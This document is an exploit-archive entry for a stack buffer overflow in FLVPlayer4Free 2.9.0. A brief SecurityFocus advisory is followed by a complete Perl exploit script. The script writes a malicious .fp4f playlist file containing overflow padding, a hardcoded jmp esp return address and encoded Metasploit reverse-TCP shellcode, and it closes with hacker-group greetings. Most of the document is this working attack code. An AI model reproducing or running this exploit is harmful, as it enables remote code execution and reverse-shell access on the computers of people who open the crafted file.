FLVPlayer4Free 2.9 - '.fp4f' Remote Buffer Overflow

source: https://www.securityfocus.com/bid/47045/info

FLVPlayer4Free is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

FLVPlayer4Free 2.9.0 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl

###
# Title : FLVPlayer4Free v2.9 (.fp4f) Stack Overflow
# Author : KedAns-Dz
# E-mail : [email protected]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows 
# Impact : Stack Overflow
# Tested on : Windows XP SP3 Fran�ais 
# Target : FLVPlayer4Free v 2.9.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------

#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";                  
print "    |=============================================|\n";
print "    |= [!] Name : FLVPlayer4Free (.fp4f) v2.9    =|\n";
print "    |= [!] Exploit : Stack Overflow Exploit      =|\n";
print "    |= [!] Author : KedAns-Dz                    =|\n";
print "    |= [!] Mail: Ked-h(at)hotmail(dot)com        =|\n";
print "    |=============================================|\n";
sleep(2);
print "\n";
my $junk= "http://"."\x41" x 17425;
my $eip = pack('V',0x7C86467B); # jmp esp from kernel32.dll
my $padding = "\x90" x 30;
# windows/shell_reverse_tcp - 739 bytes (http://www.metasploit.com)
# Encoder: x86/alpha_mixed
# LHOST=127.0.0.1, LPORT=4444
my $shellcode = 
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49" .
"\x78\x4e\x69\x45\x50\x47\x70\x43\x30\x51\x70\x4e\x69\x4d" .
"\x35\x44\x71\x4e\x32\x45\x34\x4c\x4b\x43\x62\x44\x70\x4c" .
"\x4b\x51\x42\x44\x4c\x4e\x6b\x50\x52\x47\x64\x4c\x4b\x44" .
"\x32\x46\x48\x44\x4f\x4f\x47\x43\x7a\x46\x46\x45\x61\x4b" .
"\x4f\x50\x31\x4f\x30\x4e\x4c\x45\x6c\x50\x61\x51\x6c\x45" .
"\x52\x46\x4c\x45\x70\x49\x51\x4a\x6f\x44\x4d\x43\x31\x4b" .
"\x77\x4a\x42\x4c\x30\x50\x52\x42\x77\x4e\x6b\x43\x62\x44" .
"\x50\x4c\x4b\x42\x62\x47\x4c\x43\x31\x48\x50\x4e\x6b\x51" .
"\x50\x42\x58\x4e\x65\x4b\x70\x51\x64\x50\x4a\x46\x61\x4e" .
"\x30\x46\x30\x4e\x6b\x51\x58\x44\x58\x4e\x6b\x43\x68\x45" .
"\x70\x46\x61\x49\x43\x4b\x53\x45\x6c\x47\x39\x4e\x6b\x46" .
"\x54\x4e\x6b\x47\x71\x49\x46\x45\x61\x49\x6f\x50\x31\x49" .
"\x50\x4e\x4c\x4b\x71\x48\x4f\x44\x4d\x45\x51\x49\x57\x46" .
"\x58\x4b\x50\x43\x45\x49\x64\x44\x43\x51\x6d\x48\x78\x45" .
"\x6b\x51\x6d\x46\x44\x50\x75\x48\x62\x46\x38\x4c\x4b\x43" .
"\x68\x47\x54\x47\x71\x4e\x33\x43\x56\x4c\x4b\x46\x6c\x42" .
"\x6b\x4e\x6b\x42\x78\x45\x4c\x47\x71\x4a\x73\x4e\x6b\x43" .
"\x34\x4c\x4b\x47\x71\x48\x50\x4d\x59\x51\x54\x44\x64\x51" .
"\x34\x43\x6b\x43\x6b\x50\x61\x43\x69\x42\x7a\x43\x61\x4b" .
"\x4f\x4d\x30\x46\x38\x51\x4f\x51\x4a\x4c\x4b\x47\x62\x48" .
"\x6b\x4c\x46\x43\x6d\x45\x38\x45\x63\x44\x72\x47\x70\x43" .
"\x30\x42\x48\x50\x77\x42\x53\x46\x52\x51\x4f\x43\x64\x45" .
"\x38\x42\x6c\x50\x77\x51\x36\x43\x37\x4b\x4f\x4a\x75\x4f" .
"\x48\x4a\x30\x45\x51\x45\x50\x47\x70\x51\x39\x4f\x34\x50" .
"\x54\x42\x70\x45\x38\x46\x49\x4d\x50\x42\x4b\x43\x30\x49" .
"\x6f\x48\x55\x50\x50\x50\x50\x50\x50\x50\x50\x47\x30\x42" .
"\x70\x51\x50\x46\x30\x43\x58\x4a\x4a\x46\x6f\x49\x4f\x4d" .
"\x30\x4b\x4f\x49\x45\x4d\x59\x48\x47\x45\x38\x51\x6f\x47" .
"\x70\x45\x50\x47\x71\x43\x58\x46\x62\x45\x50\x44\x51\x43" .
"\x6c\x4b\x39\x4d\x36\x42\x4a\x42\x30\x50\x56\x51\x47\x45" .
"\x38\x4e\x79\x4e\x45\x42\x54\x51\x71\x4b\x4f\x4b\x65\x50" .
"\x68\x50\x63\x50\x6d\x45\x34\x45\x50\x4d\x59\x48\x63\x42" .
"\x77\x50\x57\x42\x77\x46\x51\x4a\x56\x50\x6a\x46\x72\x50" .
"\x59\x46\x36\x4b\x52\x4b\x4d\x42\x46\x48\x47\x42\x64\x44" .
"\x64\x47\x4c\x45\x51\x46\x61\x4c\x4d\x51\x54\x47\x54\x46" .
"\x70\x48\x46\x45\x50\x47\x34\x51\x44\x50\x50\x42\x76\x42" .
"\x76\x46\x36\x50\x46\x46\x36\x42\x6e\x42\x76\x46\x36\x51" .
"\x43\x46\x36\x50\x68\x51\x69\x48\x4c\x47\x4f\x4e\x66\x4b" .
"\x4f\x4e\x35\x4f\x79\x4b\x50\x50\x4e\x43\x66\x51\x56\x49" .
"\x6f\x44\x70\x43\x58\x45\x58\x4f\x77\x45\x4d\x43\x50\x49" .
"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4f\x45\x4e\x42\x51\x46\x42" .
"\x48\x4c\x66\x4f\x65\x4d\x6d\x4d\x4d\x4b\x4f\x4a\x75\x45" .
"\x6c\x45\x56\x51\x6c\x47\x7a\x4b\x30\x49\x6b\x4b\x50\x50" .
"\x75\x47\x75\x4d\x6b\x47\x37\x46\x73\x44\x32\x42\x4f\x50" .
"\x6a\x43\x30\x42\x73\x49\x6f\x48\x55\x41\x41";
open(file , ">", "Kedans.fp4f"); 
print file $junk.$eip.$padding.$shellcode;  
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file); 

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com 
# www.metasploit.com * www.securityreason.com *  All Security and Exploits Webs ...
#================================================================================================